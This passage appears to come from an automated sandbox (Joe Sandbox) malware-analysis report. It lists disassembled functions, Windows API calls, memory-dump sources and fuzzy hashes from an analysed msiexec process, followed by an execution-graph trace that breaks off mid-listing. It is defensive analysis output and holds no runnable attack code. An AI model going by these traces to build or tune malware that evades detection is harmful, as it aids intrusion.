                                                                            • GetLastError.KERNEL32(?,235F5C88,235F1D66,00000000,00000000,00000000,?,235F5E85,00000006,FlsSetValue,235FE190,FlsSetValue,00000000,00000364,?,235F5BC8), ref: 235F5D1F
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,235F5C88,235F1D66,00000000,00000000,00000000,?,235F5E85,00000006,FlsSetValue,235FE190,FlsSetValue,00000000), ref: 235F5D2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: 1daf49ec6c88f8f70d482644c91656edb5a582fd910cf6b0a3a158ffdc30bba2
                                                                            • Instruction ID: ec0c14ba56b73c7aff9acbe2f79da4e410766d6b916f2e9beec77e75e591a651
                                                                            • Opcode Fuzzy Hash: 1daf49ec6c88f8f70d482644c91656edb5a582fd910cf6b0a3a158ffdc30bba2
                                                                            • Instruction Fuzzy Hash: 9301F736603222ABC3216A68EC4CF463B9CEF077A1B160E61FA0DD7144D724DA02CAE0
                                                                            Function 235F6E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 235F69F3: GetOEMCP.KERNEL32(00000000,?,?,235F6C7C,?), ref: 235F6A1E
                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,235F6CC1,?,00000000), ref: 235F6E94
                                                                            • GetCPInfo.KERNEL32(00000000,235F6CC1,?,?,?,235F6CC1,?,00000000), ref: 235F6EA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CodeInfoPageValid
                                                                            • String ID: [nk/
                                                                            • API String ID: 546120528-416449849
                                                                            • Opcode ID: 0f29a88bd2dad0de25fa8f9581b32c2a04c92f919797518c9e45d4a7fd3ca5ce
                                                                            • Instruction ID: e3d6cbe8c2aa5e5b6d18297248beebb5cc27c36d81dfdabbc77f8c234a5b2c39
                                                                            • Opcode Fuzzy Hash: 0f29a88bd2dad0de25fa8f9581b32c2a04c92f919797518c9e45d4a7fd3ca5ce
                                                                            • Instruction Fuzzy Hash: 45513070A043459FDB209F31E481AABBBF9EF53304F1885EED18A8B156D735D646CB90
                                                                            Function 235F6ACB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 235F6AF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $[nk/
                                                                            • API String ID: 1807457897-2625282278
                                                                            • Opcode ID: eb8336eba9b16011f251c8ae0b0cab131ec96f2b505ad473c5db31e84511d9ec
                                                                            • Instruction ID: 6e909df5e9f6e32515291f3e29149ec1c268b1d07423e8535d4fb609196e87e3
                                                                            • Opcode Fuzzy Hash: eb8336eba9b16011f251c8ae0b0cab131ec96f2b505ad473c5db31e84511d9ec
                                                                            • Instruction Fuzzy Hash: 7C41E77050438C9ADB218F68DD84EE6BBF9EB56308F1804EDD5CE87142D235AA56CF60
                                                                            Function 235F9807 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,235F9C44,?,00000000,?,00000000,00000000), ref: 235F98B1
                                                                            • GetLastError.KERNEL32(?,235F9C44,?,00000000,?,00000000,00000000,?,00000000), ref: 235F98DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID: [nk/
                                                                            • API String ID: 442123175-416449849
                                                                            • Opcode ID: b25a36438740f2d3bdd492d0a02e4235451fbf2de7267d6e08a773875e181b42
                                                                            • Instruction ID: 786ecf7de23b9cc24d3c9cb1911cafe4adf0c595ed88f9cd0d5c9dc740196b62
                                                                            • Opcode Fuzzy Hash: b25a36438740f2d3bdd492d0a02e4235451fbf2de7267d6e08a773875e181b42
                                                                            • Instruction Fuzzy Hash: 88319371A006199BCB24DF59DC809D9B3F9FF99311F2484EAE50ED7250E730E981CB50
                                                                            Function 235F9728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,235F9C64,?,00000000,?,00000000,00000000), ref: 235F97C3
                                                                            • GetLastError.KERNEL32(?,235F9C64,?,00000000,?,00000000,00000000,?,00000000), ref: 235F97EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID: [nk/
                                                                            • API String ID: 442123175-416449849
                                                                            • Opcode ID: 1e742f49fed7745c75f7c31c976bcf2fa6c34c3d2c52ae2be812d3a5a3071f01
                                                                            • Instruction ID: 196106c59b07c09a444fd714bdeca02d519795fdf7f8182b583568bc8b916799
                                                                            • Opcode Fuzzy Hash: 1e742f49fed7745c75f7c31c976bcf2fa6c34c3d2c52ae2be812d3a5a3071f01
                                                                            • Instruction Fuzzy Hash: 2F21B175A013199FCB24DF59D880BD9B3F9FB4A306F1004EAE54AD7251D730EA82CB60
                                                                            Function 235F5C45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 235F5CA5
                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 235F5CB2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                            • String ID: [nk/
                                                                            • API String ID: 2279764990-416449849
                                                                            • Opcode ID: 7c7484e27e920d2d732de0c4a0343277185f0af3e3f05885a7c44fe499184d98
                                                                            • Instruction ID: fe6b9913da8d090d222484ba87f8893efad7babc61a94eb1c7b7c5fa27b76390
                                                                            • Opcode Fuzzy Hash: 7c7484e27e920d2d732de0c4a0343277185f0af3e3f05885a7c44fe499184d98
                                                                            • Instruction Fuzzy Hash: 4A1120336015219FDB31BD19F94195A73A9EB9232472A0AA0FE1EEB248D734DC0586D1
                                                                            Function 235F16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: : $Se.
                                                                            • API String ID: 4218353326-4089948878
                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction ID: 2105a12774acdefb43d88d2c66e9b2c6059efbb6a17efb313575c3412c8da9a4
                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction Fuzzy Hash: 3711EBB5A003486EC710DFA8E840BDDFBFCAF5A204F144096E549E7212E6709706C765
                                                                            Function 235F2ADA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 235F2B4F
                                                                            • ___raise_securityfailure.LIBCMT ref: 235F2C36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                            • String ID: [nk/
                                                                            • API String ID: 3761405300-416449849
                                                                            • Opcode ID: 05e7d9ccac975439633c6d171485a2cdec8ebdb70a6b0fdeeb1403f34ddcb646
                                                                            • Instruction ID: 69f07cd0b3c4effa66e92b60ccaa35da422e2c9d7ac668c0f19c2a08f27bc460
                                                                            • Opcode Fuzzy Hash: 05e7d9ccac975439633c6d171485a2cdec8ebdb70a6b0fdeeb1403f34ddcb646
                                                                            • Instruction Fuzzy Hash: 5A21F8B451A3009AD310EF15D683A2077FCFB6871AF38406AE98897398E3B8D581CF45
                                                                            Function 235F5F19 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 235F5F8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: String
                                                                            • String ID: LCMapStringEx$[nk/
                                                                            • API String ID: 2568140703-2457954262
                                                                            • Opcode ID: 6949e30e1b2e9d640a8d502898ad51ae550116f56a3b991d8e9aa7744d5bf965
                                                                            • Instruction ID: f7208e59e233edceabf3474275a7851db1538e430eb4da7119fb8b7df4e8b8b4
                                                                            • Opcode Fuzzy Hash: 6949e30e1b2e9d640a8d502898ad51ae550116f56a3b991d8e9aa7744d5bf965
                                                                            • Instruction Fuzzy Hash: CA011332500249BBCF22AF91EC00EAE7FB6EF5A710F004594FE1C66124CA36D931AB85
                                                                            Function 235F1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 235F2903
                                                                              • Part of subcall function 235F35D2: RaiseException.KERNEL32(?,?,?,235F2925,00000000,00000000,00000000,?,?,?,?,?,235F2925,?,236021B8), ref: 235F3632
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 235F2920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3476068407-410509341
                                                                            • Opcode ID: 4e9baa1778a663fd2beb978ed7342bc0405755e575eb7e14614d437140eda59d
                                                                            • Instruction ID: 833912910590366fd69a402066dfbc588add01bd7272e8ef0f16a1bb0168db05
                                                                            • Opcode Fuzzy Hash: 4e9baa1778a663fd2beb978ed7342bc0405755e575eb7e14614d437140eda59d
                                                                            • Instruction Fuzzy Hash: 19F0FFB8A1430CB7CB04B6A4FC849A937BCAF53650B5081E0AA2CD2095EB30EA1685C0
                                                                            Function 235F5EB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 235F5F02
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                            • String ID: InitializeCriticalSectionEx$[nk/
                                                                            • API String ID: 2593887523-2533381023
                                                                            • Opcode ID: be3a4f8f17aacbf73466e3104561f423fb9c330fea9fb6c771c1f51a15623bc0
                                                                            • Instruction ID: ca91579107a8b061cc9557be46ed3159002ea539101a03bfa86424ef5120a0a8
                                                                            • Opcode Fuzzy Hash: be3a4f8f17aacbf73466e3104561f423fb9c330fea9fb6c771c1f51a15623bc0
                                                                            • Instruction Fuzzy Hash: 04F0BE31541108BBCB217F55EC00DAEBFB5EB6A711B0084D5FD1DAA254DB3299119A94
                                                                            Function 235F69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetOEMCP.KERNEL32(00000000,?,?,235F6C7C,?), ref: 235F6A1E
                                                                            • GetACP.KERNEL32(00000000,?,?,235F6C7C,?), ref: 235F6A35
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: |l_#
                                                                            • API String ID: 0-3726951061
                                                                            • Opcode ID: 33d9e1f8022c09268f6460a291a8e7efe9815c76256762fd551a5685f19ba93e
                                                                            • Instruction ID: f17b4e409d772183081773301da25a8c85fa4e54813216fd42087bb121ac27ed
                                                                            • Opcode Fuzzy Hash: 33d9e1f8022c09268f6460a291a8e7efe9815c76256762fd551a5685f19ba93e
                                                                            • Instruction Fuzzy Hash: 22F0AF30504108CBD710EF64D849B6C37F8FB1233AF284784E87C8A1C9EB758946CB40
                                                                            Function 235F5D5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Alloc
                                                                            • String ID: FlsAlloc$[nk/
                                                                            • API String ID: 2773662609-2862356477
                                                                            • Opcode ID: dbc2638f76ce9e3fcadd7053f3844479d41b257a9b01d41b248d1c5af8fe3205
                                                                            • Instruction ID: 43cfdfacf53442018896c7c93c51db3356e967dbc45de6e111185054d6362681
                                                                            • Opcode Fuzzy Hash: dbc2638f76ce9e3fcadd7053f3844479d41b257a9b01d41b248d1c5af8fe3205
                                                                            • Instruction Fuzzy Hash: E3E0E53160221C6BD3317B61AC04E6EBBA9DF67711B1105D9FD0ED6205DE259A0285D9
                                                                            Function 235F5DB2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Free
                                                                            • String ID: FlsFree$[nk/
                                                                            • API String ID: 3978063606-1047291440
                                                                            • Opcode ID: f3cc3e4ddb91ed41337615706cc1d6ddb8dd5b47fa2cb43d4359d11bc3fc1eb1
                                                                            • Instruction ID: 1a00ba676cd9b3451d61216b37c6b17fd73e158aaf22e1fcb2a2a22d4715ff62
                                                                            • Opcode Fuzzy Hash: f3cc3e4ddb91ed41337615706cc1d6ddb8dd5b47fa2cb43d4359d11bc3fc1eb1
                                                                            • Instruction Fuzzy Hash: 88E0E571A02118ABC3217B65AC04D6EFBA4DF67B00B0105D9FD0ED7205DA318E1186D6

                                                                            Execution Graph

                                                                            Execution Coverage:5.8%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:1.3%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:74
                                                                            execution_graph 40275 441819 40278 430737 40275->40278 40277 441825 40279 430756 40278->40279 40280 43076d 40278->40280 40281 430774 40279->40281 40282 43075f 40279->40282 40280->40277 40293 43034a memcpy 40281->40293 40292 4169a7 11 API calls 40282->40292 40285 4307ce 40286 430819 memset 40285->40286 40294 415b2c 11 API calls 40285->40294 40286->40280 40287 43077e 40287->40280 40287->40285 40290 4307fa 40287->40290 40289 4307e9 40289->40280 40289->40286 40295 4169a7 11 API calls 40290->40295 40292->40280 40293->40287 40294->40289 40295->40280 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 